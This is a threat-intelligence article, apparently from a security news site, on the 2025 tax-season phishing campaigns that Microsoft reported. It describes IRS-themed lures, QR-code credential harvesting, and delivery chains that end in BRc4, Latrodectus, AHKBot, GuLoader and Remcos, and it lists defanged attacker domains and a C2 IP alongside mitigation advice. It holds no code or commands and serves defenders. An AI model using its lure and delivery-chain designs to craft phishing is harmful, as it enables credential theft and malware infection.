Tax Season Phishing 2025 - Full Threat Breakdown

As the U.S. tax deadline approaches, cybercriminals are once again capitalizing on seasonal anxiety to deploy highly-targeted phishing campaigns. Microsoft Threat Intelligence has tracked a surge in tax-themed lures designed to steal credentials and deliver malware—including Latrodectus, BruteRatel C4 (BRc4), GuLoader, and Remcos—leveraging tools like QR codes, redirect chains, and phishing-as-a-service (PhaaS) kits.

Overview: Social Engineering Meets Modular Malware Delivery

The campaigns analyzed span multiple threat actors and malware delivery techniques, often beginning with convincing IRS-themed lures. These phishing emails exploit trust in familiar services—like DocuSign or Microsoft 365—and rely on redirection tactics to evade detection.

Microsoft observed:

• Fake tax verification forms with embedded links

• PDF attachments containing QR codes

• Redirects hosted on compromised websites

• Abused cloud services (e.g., Firebase, Dropbox)

Each vector leads victims down a malware delivery chain that often ends in system compromise and remote control.

Notable Campaigns Observed in Early 2025

BRc4 and Latrodectus: Delivered via Fake IRS Verification Forms

On February 6, 2025, Microsoft detected a large-scale phishing campaign targeting U.S.-based users with IRS-themed emails. These messages claimed there were issues with the recipient’s tax filing and included attachments titled to resemble IRS verification forms (e.g., lrs_Verification_Form_2182.pdf). Once opened, these PDFs used embedded DoubleClick URLs that redirected victims through Rebrandly link shorteners to fake DocuSign sites. If the victim clicked the “Download” button on these spoofed pages, a script would assess the user’s environment before delivering a JavaScript file hosted on Firebase.

If the victim passed the filter conditions, the JavaScript would download an MSI installer that deployed BRc4, followed by Latrodectus. This campaign has been attributed to Storm-0249, a known access broker active since 2021, previously linked to Emotet, IcedID, and Bumblebee. Latrodectus, observed in its updated 1.9 variant, acts as a loader with advanced anti-analysis and persistence capabilities, while BRc4 continues to be exploited outside of its intended red-team use cases.

Threat actor: Storm-0249
Initial lure: Tax filing error notices with PDF attachments
Delivery mechanism:

1. PDF links to DoubleClick → Rebrandly → Fake DocuSign site

2. Downloads a JavaScript payload → MSI → Installs BRc4

3. BRc4 then installs Latrodectus

Latrodectus is primarily a loader with dynamic C2 configs and anti-analysis features, now updated to persist via scheduled tasks and support command execution.

QR Code PDFs: Phishing-as-a-Service via RaccoonO365

Between February 12 and 28, over 2,300 organizations were targeted with tax-themed phishing emails containing no body text—just a PDF attachment. Each PDF displayed a QR code leading to a credential harvesting site hosted at shareddocumentso365cloudauthstorage[.]com. These phishing kits were powered by RaccoonO365, a PhaaS platform known for mimicking Microsoft 365 login pages and dynamically customizing links with the target’s email address as a query parameter.

Attackers used misleading sender display names like “EMPLOYEE TAX REFUND REPORT” or “Insurance Payment Schedule” to avoid suspicion. This campaign illustrates an ongoing trend of using QR codes not just for initial access, but also to evade email gateway scanning. Because QR code parsing often escapes traditional filtering systems, this method has become increasingly popular among threat actors who need just one scan to compromise an identity.

Targeted industries: Engineering, IT, consulting
Date range: Feb 12–28, 2025
Mechanism:

• Blank emails with PDF attachments

• Each PDF contains a QR code unique to the recipient (email in query string)

• Links lead to fake Microsoft 365 login pages hosted via RaccoonO365 PhaaS

Display names used include misleading titles like “EMPLOYEE TAX REFUND REPORT” or “Client Contract Negotiation.”

AHKBot: Delivered Through Malicious Excel File

On February 13, Microsoft observed a phishing email with the subject line "IRS Refund Eligibility Notification" and a sender from eboxsystems[.]com. The email linked to a Google Business page configured as an open redirector, which in turn pointed to a compromised site hosting a malicious .xlsm file. If the user enabled macros in this Excel file, it triggered the download and execution of an MSI file from acusense[.]ae.

The MSI package contained a legitimate AutoHotKey.exe binary and a malicious script, AutoNotify.ahk, which ran in an infinite loop to download additional AutoHotKey-based payloads. One of the follow-on modules, Screenshotter, was used to capture screen content from infected machines and exfiltrate it via the C2 IP 181.49.105[.]59. This attack is notable for its abuse of native scripting environments and "living-off-the-land" binaries, helping it stay under the radar during initial infection stages.

Observed: Feb 13, 2025
Lure: “IRS Refund Eligibility Notification”
Delivery flow:

• Hyperlink leads to Google redirector → Compromised site hosting Excel file

• Macros enabled → Downloads malicious MSI from acusense[.]ae

• MSI contains:

  • Legitimate AutoHotKey binary

  • Malicious .ahk Looper script

  • Screenshotting module

C2 communication was handled through IP 181.49.105[.]59

GuLoader and Remcos: Rapport-Building Campaign

Another tax-themed campaign observed on March 3 took a more conversational approach. Threat actors reached out to CPAs and accountants using benign emails that claimed prior negligence from a different CPA and requested help with urgent tax filings. If the recipient responded, a second email followed with a PDF attachment that contained an embedded Dropbox link. That link downloaded a ZIP archive full of .lnk files disguised as tax documents.

When one of the LNK files was executed, it launched PowerShell commands to download a BAT script and a decoy PDF. The BAT file then fetched GuLoader, which finally installed Remcos RAT. This multi-stage infection chain emphasized social trust and engagement before delivering malware. The use of remote management tools like Remcos—known for keylogging, screen capture, and persistence—underscores the risk to professionals who deal with financial data and PII.

Observed: March 3, 2025
Target: CPAs and accounting professionals
Tactic:

1. Email 1: Benign inquiry from a fake client

2. Email 2: Malicious PDF attachment if the recipient responds

3. PDF downloads ZIP from Dropbox → LNK file → PowerShell → GuLoader → Remcos

This two-step approach aims to build trust before delivering the payload, increasing click-through and execution rates.

Key Payloads and Infrastructure

Each campaign delivered one or more modular tools built for stealth, persistence, or lateral movement. BRc4, though marketed as a legitimate red-teaming tool, continues to be co-opted for real-world attacks. Latrodectus, in its latest form, supports dynamic C2s and complex data exfiltration strategies. GuLoader and AHKBot both serve as delivery mechanisms for more capable RATs like Remcos, which remains a popular post-infection toolkit among cybercrime groups. Collectively, these payloads form a flexible stack of initial access, control, and data theft capabilities that can be repurposed across verticals.

• BRc4: Red-teaming tool used for post-exploitation and lateral movement

• Latrodectus: Modular loader with strong evasion techniques

• GuLoader: Shellcode-based loader with obfuscation and sandbox detection

• Remcos: RAT capable of screen capture, keystroke logging, and stealth operations

• AHKBot: AutoHotKey-based loader for modular malware delivery

• RaccoonO365: Phishing-as-a-Service mimicking Microsoft login flows

Detection and Mitigation Guidance

Microsoft recommends a layered defense strategy, starting with phishing-resistant authentication (such as FIDO2 or certificate-based auth) and full MFA enforcement. Organizations should enable Safe Links and Zero-Hour Auto Purge (ZAP) in Microsoft 365 to retroactively neutralize threats post-delivery. QR code scanning in email attachments should be explicitly flagged or disabled in email security gateways. Browser-based defenses like SmartScreen and network-level protections such as Microsoft Defender’s Network Protection can help reduce the risk of successful redirection.

Security teams should also consider endpoint-level safeguards like Defender for Endpoint’s EDR in block mode, cloud-delivered protection, and automated investigation and remediation features. Finally, ongoing user education—especially for high-risk groups like finance and HR—should include updated phishing simulations using QR codes, spoofed DocuSign pages, and tax refund lures.

• Enforcing MFA and phishing-resistant authentication

• Educating employees on social engineering tactics and IRS impersonation

• Blocking QR-code-based redirects and monitoring for PhaaS indicators

• Using Safe Links and Defender for Office 365’s ZAP and click-verification features

• Leveraging Microsoft Defender XDR and Sentinel for automated detection and hunting queries

IOCs

For full IOCs please check Microsoft’s Threat Intel - big thanks to them for putting together. Here is an example:

BruteRatel C4 and Lactrodectus infection chain

Final Thoughts

Even well-known social engineering tactics remain effective when combined with evasive malware and PhaaS infrastructure. Defenders should ensure layered protections, increase phishing simulations around key dates like April 15, and maintain updated threat hunting rules aligned with current IOCs.

Guards up!

🔗 Related Phishing Reports on VulnU

• Google Reports Uptick in Higher Education Phishing Attacks
  An increase in phishing attacks targeting U.S. universities exploits trust in familiar services to steal credentials and financial information

• Phishing Attacks Lead to New TorNet Backdoor
  Ongoing phishing campaigns deliver a new backdoor called TorNet, along with Agent Tesla and the Snake keylogger, using sophisticated evasion techniques

• JavaGhost Phishing Campaigns Exploit AWS Misconfigurations
  Attackers leverage AWS misconfigurations to send phishing emails from trusted domains, highlighting the importance of securing cloud environments

• Russian-Linked Actors Target Accounts With Device Code Phishing Tactic
  A sophisticated phishing campaign exploits device code authentication flows to access accounts, demonstrating evolving tactics by nation-state actors

• Russian Spear-Phishing Attacks Targeted WhatsApp Accounts
  The Star Blizzard threat group expands its spear-phishing tactics to target WhatsApp accounts, showcasing the diversification of attack vectors